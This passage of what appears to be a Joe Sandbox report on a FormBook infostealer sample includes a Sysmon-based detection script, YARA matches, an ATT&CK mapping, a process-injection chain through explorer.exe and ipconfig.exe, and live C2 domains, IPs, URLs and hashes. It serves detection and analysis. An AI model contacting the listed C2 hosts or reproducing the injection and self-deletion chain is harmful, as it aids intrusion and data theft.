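            # Rule 3: that utility deleting a file through cmd /c del (dropper self-removal).
            if img == "cmd.exe" and "/c del" in cmd and parent in NET_UTILITIES:
                alerts.append(("utility_deletes_dropper", f"{parent} -> {e['CommandLine']}"))
        elif eid == 10:
            # Rule 4: a process opening explorer.exe with write or thread-creation rights.
            mask = int(str(e["GrantedAccess"]), 16)
            if basename(e["TargetImage"]) == "explorer.exe" and mask & INJECT_MASK:
                alerts.append(("write_access_to_explorer",
                               f"{basename(e['SourceImage'])} GrantedAccess={e['GrantedAccess']}"))
    return alerts


# Constructed Sysmon-style events mirroring the chain in this report; two benign events are mixed in.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 3, "ProcessId": 3440, "Image": "C:\\Windows\\explorer.exe",
     "DestinationIp": "162.241.62.54", "DestinationPort": 80, "DestinationHostname": "jorgeporcayo.com"},
    {"EventID": 3, "ProcessId": 3440, "Image": "C:\\Windows\\explorer.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 445},                         # benign: file share
    {"EventID": 1, "ProcessId": 4100, "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"},     # benign: user launch
    {"EventID": 1, "ProcessId": 4212, "Image": "C:\\Windows\\SysWOW64\\ipconfig.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "C:\\Windows\\SysWOW64\\ipconfig.exe"},
    {"EventID": 10, "SourceImage": "C:\\Windows\\SysWOW64\\ipconfig.exe",
     "TargetImage": "C:\\Windows\\explorer.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "ProcessId": 4300, "Image": "C:\\Windows\\SysWOW64\\cmd.exe",
     "ParentImage": "C:\\Windows\\SysWOW64\\ipconfig.exe",
     "CommandLine": "/c del 'C:\\Users\\user\\Desktop\\v8kZUFgdD4.exe'"},
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

Rule 1 and rule 4 are the strong ones (explorer.exe does not fetch web pages, and nothing but security tooling needs write access to it); rules 2 and 3 are weak alone and are there to tie the ipconfig.exe child and the cmd /c del back to the same tree. The APC queueing and thread-context change the report records have no Sysmon event of their own, so the ProcessAccess rights are the nearest observable.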

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Path Interception | Process Injection 512 | Virtualization/Sandbox Evasion 2 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 512 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 11 | LSA Secrets | System Network Configuration Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

          Behavior Graph


          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 452667
Sample: v8kZUFgdD4.exe
Start date: 22/07/2021
Architecture: WINDOWS
Score: 100

Start node (sample)
  DNS/IP info: www.wthcoffee.com; www.cwdelrio.com; wthcoffee.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures
  -> v8kZUFgdD4.exe (started)
       Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
       -> v8kZUFgdD4.exe (started)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            -> explorer.exe (injected)
                 DNS/IP info: jorgeporcayo.com 162.241.62.54, 49763, 80 UNIFIEDLAYER-AS-1US United States; doityourselfism.com 169.62.77.158, 49752, 80 SOFTLAYERUS United States; 14 other IPs or domains
                 Signatures: System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings
                 -> ipconfig.exe 12 (started)
                      DNS/IP info: www.aizaibali.com
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                      -> cmd.exe 1 (started)
                           -> conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
v8kZUFgdD4.exe | 38% | Virustotal |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
7.2.ipconfig.exe.3ac7960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.v8kZUFgdD4.exe.2190000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
7.2.ipconfig.exe.11406b0.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.v8kZUFgdD4.exe.21d0000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.v8kZUFgdD4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.1.v8kZUFgdD4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
extinctionbrews.com | 5% | Virustotal |
www.aizaibali.com | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.okinawarongnho.com/dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.doityourselfism.com/dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx | 100% | Avira URL Cloud | malware
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.scuolatua.com/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
http://www.extinctionbrews.com/dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx | 100% | Avira URL Cloud | malware
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
www.extinctionbrews.com/dy8g/ | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.ecofingers.com/dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.jorgeporcayo.com/dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
extinctionbrews.com | 34.102.136.180 | true | false | - | unknown
jorgeporcayo.com | 162.241.62.54 | true | true | - | unknown
www.aizaibali.com | 154.88.31.204 | true | true | - | unknown
invisiongc.net | 34.102.136.180 | true | false | - | unknown
www.scuolatua.com | 62.149.128.40 | true | true | - | unknown
www.findfoodshop.com | 119.59.120.26 | true | true | - | unknown
doityourselfism.com | 169.62.77.158 | true | true | - | unknown
okinawarongnho.com | 103.138.88.11 | true | true | - | unknown
www.ecofingers.com | 52.58.78.16 | true | true | - | unknown
wthcoffee.com | 184.168.131.241 | true | true | - | unknown
www.wthcoffee.com | unknown | unknown | true | - | unknown
www.oikoschain.com | unknown | unknown | true | - | unknown
www.xn--vuq722jwngjre.com | unknown | unknown | true | - | unknown
www.extinctionbrews.com | unknown | unknown | true | - | unknown
www.doityourselfism.com | unknown | unknown | true | - | unknown
www.cwdelrio.com | unknown | unknown | true | - | unknown
www.invisiongc.net | unknown | unknown | true | - | unknown
www.jorgeporcayo.com | unknown | unknown | true | - | unknown
www.okinawarongnho.com | unknown | unknown | true | - | unknown

                                            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.okinawarongnho.com/dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx | true | Avira URL Cloud: safe | unknown
http://www.doityourselfism.com/dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx | true | Avira URL Cloud: safe | unknown
http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx | true | Avira URL Cloud: malware | unknown
http://www.scuolatua.com/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx | true | Avira URL Cloud: safe | unknown
http://www.extinctionbrews.com/dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx | false | Avira URL Cloud: safe | unknown
http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx | false | Avira URL Cloud: malware | unknown
www.extinctionbrews.com/dy8g/ | true | Avira URL Cloud: safe | low
http://www.ecofingers.com/dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx | true | Avira URL Cloud: safe | unknown
http://www.jorgeporcayo.com/dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx | true | Avira URL Cloud: safe | unknown

                                            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.tiro.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fonts.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3 | ipconfig.exe, 00000007.00000002.601572909.0000000003C42000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                                                                  Contacted IPs


                                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.58.78.16 | www.ecofingers.com | United States | 16509 | AMAZON-02US | true
62.149.128.40 | www.scuolatua.com | Italy | 31034 | ARUBA-ASNIT | true
162.241.62.54 | jorgeporcayo.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
169.62.77.158 | doityourselfism.com | United States | 36351 | SOFTLAYERUS | true
34.102.136.180 | extinctionbrews.com | United States | 15169 | GOOGLEUS | false
103.138.88.11 | okinawarongnho.com | Viet Nam | 45538 | ODS-AS-VNOnlinedataservicesVN | true
154.88.31.204 | www.aizaibali.com | Seychelles | 40065 | CNSERVERSUS | true
119.59.120.26 | www.findfoodshop.com | Thailand | 56067 | METRABYTE-TH453LadplacoutJorakhaebuaTH | true

                                                                  General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 452667
Start date: 22.07.2021
Start time: 17:41:18
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 46s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: v8kZUFgdD4.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/0@16/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 19.7% (good quality ratio 16.8%)
• Quality average: 71.2%
• Quality standard deviation: 34.6%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 79
• Number of non-executed functions: 38
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.88.21.125, 92.122.145.220, 104.42.151.234, 52.147.198.201, 20.82.209.183, 173.222.108.226, 173.222.108.210, 51.103.5.186, 52.251.79.25, 40.112.88.60, 80.67.82.235, 80.67.82.211, 23.35.236.56, 20.82.210.154
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs


                                                                  Domains


                                                                  ASN


                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  No created / dropped files found

                                                                  Static File Info

                                                                  General

                                                                  File type: PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit): 7.939883976403979
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name: v8kZUFgdD4.exe
                                                                  File size: 188889
                                                                  MD5: 57f3ae2842ffb5ceea386d0b97a52818
                                                                  SHA1: 68423398d025d3cbbb944ee4c3cea5501df67761
                                                                  SHA256: a0c7b3d44a5cfcda917fc80c099da5ab3de582ff7c24f1373b4bd25f88d61e52
                                                                  SHA512: f398186c2f5adb9726aac3aead8289abc9288404b4b39dbabc66494a77b0160ca560cf52c9f76b15b34619f150f516a74db96db967f75942f3c9f325c5da4a81
                                                                  SSDEEP: 3072:TwjHmsbeuEz5qDDOapMygfwt3AA4fce6/1DQj5U+FS8EoESO:TwjHFrtYwxAAMu/1cj51FSDdSO
                                                                  File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..{(dl((dl((dl(.{g()dl(.xb( dl(.{f(?dl(!..(#dl((dm(.dl(!..()dl(!..()dl(Rich(dl(........................PE..L....~.`...........

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint: 0x40205a
                                                                  Entrypoint Section: .text
                                                                  Digitally signed: false
                                                                  Imagebase: 0x400000
                                                                  Subsystem: windows gui
                                                                  Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                  DLL Characteristics: TERMINAL_SERVER_AWARE
                                                                  Time Stamp: 0x60F97EF0 [Thu Jul 22 14:21:36 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major: 5
                                                                  OS Version Minor: 0
                                                                  File Version Major: 5
                                                                  File Version Minor: 0
                                                                  Subsystem Version Major: 5
                                                                  Subsystem Version Minor: 0
                                                                  Import Hash: 91ecb5a25c0109a651f89e2d72e3496d

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push FFFFFFFFh
                                                                  push 004050F8h
                                                                  push 00402D34h
                                                                  mov eax, dword ptr fs:[00000000h]
                                                                  push eax
                                                                  mov dword ptr fs:[00000000h], esp
                                                                  sub esp, 58h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [ebp-18h], esp
                                                                  call dword ptr [00405050h]
                                                                  xor edx, edx
                                                                  mov dl, ah
                                                                  mov dword ptr [0040627Ch], edx
                                                                  mov ecx, eax
                                                                  and ecx, 000000FFh
                                                                  mov dword ptr [00406278h], ecx
                                                                  shl ecx, 08h
                                                                  add ecx, edx
                                                                  mov dword ptr [00406274h], ecx
                                                                  shr eax, 10h
                                                                  mov dword ptr [00406270h], eax
                                                                  push 00000001h
                                                                  call 00007F6BF0C0972Dh
                                                                  pop ecx
                                                                  test eax, eax
                                                                  jne 00007F6BF0C08BEAh
                                                                  push 0000001Ch
                                                                  call 00007F6BF0C08CA7h
                                                                  pop ecx
                                                                  call 00007F6BF0C0964Dh
                                                                  test eax, eax
                                                                  jne 00007F6BF0C08BEAh
                                                                  push 00000010h
                                                                  call 00007F6BF0C08C96h
                                                                  pop ecx
                                                                  xor esi, esi
                                                                  mov dword ptr [ebp-04h], esi
                                                                  call 00007F6BF0C0947Bh
                                                                  call 00007F6BF0C093D5h
                                                                  mov dword ptr [00406694h], eax
                                                                  call 00007F6BF0C0925Eh
                                                                  mov dword ptr [00406264h], eax
                                                                  call 00007F6BF0C0902Bh
                                                                  call 00007F6BF0C08F6Eh
                                                                  call 00007F6BF0C08C8Ch
                                                                  mov dword ptr [ebp-30h], esi
                                                                  lea eax, dword ptr [ebp-5Ch]
                                                                  push eax
                                                                  call dword ptr [0040504Ch]
                                                                  call 00007F6BF0C08F12h
                                                                  mov dword ptr [ebp-64h], eax
                                                                  test byte ptr [ebp-30h], 00000001h
                                                                  je 00007F6BF0C08BE8h
                                                                  movzx eax, word ptr [ebp-2Ch]

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS98 (6.0) build 8168
                                                                  • [C++] VS98 (6.0) build 8168
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [LNK] VS2008 SP1 build 30729

                                                                  Data Directories

                                                                  Name                               | Virtual Address | Virtual Size | Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT       | 0x0             | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT       | 0x5430          | 0x78         | .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE     | 0x0             | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION    | 0x0             | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY     | 0x0             | 0x0          |
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC    | 0x0             | 0x0          |
